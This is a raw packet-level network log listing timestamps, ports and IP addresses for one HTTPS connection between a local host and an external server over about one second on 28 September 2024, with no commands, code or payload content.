Sep 28, 2024 05:23:49.350826025 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.350847006 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.359528065 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.359548092 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.359603882 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.359611988 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.359848976 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.359869957 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.359908104 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.359915972 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.359937906 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.359958887 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.360635042 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.360654116 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.360692978 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.360699892 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.360718966 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.360738039 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.436170101 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.436196089 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.436275005 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.436295033 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.436620951 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.436647892 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.436683893 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.436693907 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.436708927 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.436742067 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.436897993 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.436913967 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.436964035 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.436971903 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.437210083 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.437227964 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.437258959 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.437268019 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.437289000 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.437314034 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.437427044 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.437443018 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.437488079 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.437495947 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.438184977 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.446501017 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.446517944 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.446572065 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.446579933 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.446798086 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.446816921 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.446845055 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.446856976 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.446878910 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.446902990 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.523067951 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.523092031 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.523153067 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.523178101 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.523191929 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.523228884 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.523262024 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.523469925 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.523485899 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.523535967 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.523545027 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.523720980 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.523740053 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.523768902 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.523777008 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.523796082 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.523821115 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.524092913 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.524107933 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.524156094 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.524163961 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.525027037 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.533478022 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.533494949 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.533581018 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.533592939 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.533624887 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.533648968 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.533791065 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.533838034 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.533854961 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.533863068 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.533883095 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.533900023 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.534101963 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.534116030 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.534158945 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.534167051 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.534389019 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.610110998 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.610133886 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.610200882 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.610238075 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.610254049 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.610266924 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.610281944 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.610308886 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.610768080 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.610784054 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.610836983 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.610845089 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.611005068 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.611022949 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.611047983 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.611053944 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.611083031 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.611102104 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.611263037 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.611284971 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.611315012 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.611325026 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.611336946 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.614831924 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.620255947 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.620280027 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.620367050 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.620381117 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.620490074 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.620510101 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.620536089 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.620543957 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.620573997 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.620594978 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.620821953 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.620836973 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.620870113 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.620876074 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.620899916 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.622508049 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.696973085 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.696993113 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.697041035 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.697041988 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.697063923 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.697079897 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.697084904 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.697089911 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.697124004 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.697130919 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.697156906 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.697170973 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.697386026 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.697401047 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.697428942 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.697436094 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.697597027 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.697597027 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.697597980 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.697611094 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.697633982 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.697659016 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.697669029 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.697685003 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.697923899 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.697937012 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.697962046 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.697971106 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.697988987 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.698029995 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.709389925 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.709418058 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.709458113 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.709475040 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.709489107 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.709489107 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.709517002 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.709534883 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.709539890 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.709556103 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.709558010 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.709594011 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.709599018 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.709656000 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.709656000 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.784533024 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.784555912 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.784620047 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.784636974 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.784660101 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.784678936 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.784845114 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.784861088 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.784885883 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.784892082 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.784923077 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.784936905 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.785145044 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.785161018 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.785187960 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.785192966 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.785217047 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.785232067 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.785527945 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.785542011 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.785578012 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.785583019 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.785604000 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.785620928 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.785921097 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.785938025 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.786007881 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.786016941 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.786175966 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.794059038 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.794087887 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.794121981 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.794133902 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.794152975 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.794167995 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.794250965 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.794265985 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.794292927 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.794298887 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.794320107 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.794336081 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.794718027 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.794730902 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.794790030 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.794790030 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.794795036 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.796519995 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.871598959 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.871622086 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.871725082 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.871741056 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.871763945 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.871782064 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.871831894 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.871838093 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.871851921 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.871989012 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.872003078 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.872029066 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.872035027 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.872061014 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.872086048 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.872453928 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.872469902 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.872498035 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.872503042 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.872523069 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.872540951 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.872767925 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.872783899 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.872813940 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.872818947 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.872839928 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.872855902 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.881094933 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.881114960 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.881211042 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.881211042 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.881231070 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.881280899 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.881360054 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.881376028 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.881417990 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.881423950 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.881438017 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.881464958 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.881603003 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.881618023 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.881666899 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.881671906 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.884515047 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.958329916 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.958354950 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.958436966 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.958447933 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.958663940 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.958683014 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.958722115 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.958729982 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.958744049 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.958775043 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.958962917 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.958976984 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.959005117 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.959011078 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.959026098 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.959048033 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.959469080 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.959512949 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.959526062 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.959532976 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.959569931 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.959769011 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.959810972 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.959831953 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.959836960 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.959856033 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.959878922 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.968158007 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.968208075 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.968249083 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.968255043 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.968281031 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.968302011 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.968399048 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.968440056 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.968455076 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.968461990 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.968475103 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.968501091 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.968612909 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.968652964 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.968672037 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.968678951 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.968697071 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.968714952 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.045439005 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.045485973 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.045542955 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.045559883 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.045579910 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.045623064 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.045633078 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.045675039 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.045686960 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.045703888 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.045732021 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.045763969 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.046035051 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.046076059 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.046092033 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.046099901 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.046117067 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.046134949 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.046370029 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.046410084 CEST	443	49739	172.67.167.90	192.168.2.6
